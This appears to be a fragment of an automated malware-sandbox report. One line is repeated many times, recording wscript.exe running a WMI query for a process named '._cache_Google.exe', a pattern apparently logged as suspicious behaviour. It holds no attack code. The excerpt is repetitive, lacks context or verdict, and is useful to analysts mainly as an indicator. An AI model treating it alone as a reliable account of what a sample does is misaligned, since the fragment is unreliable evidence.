                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
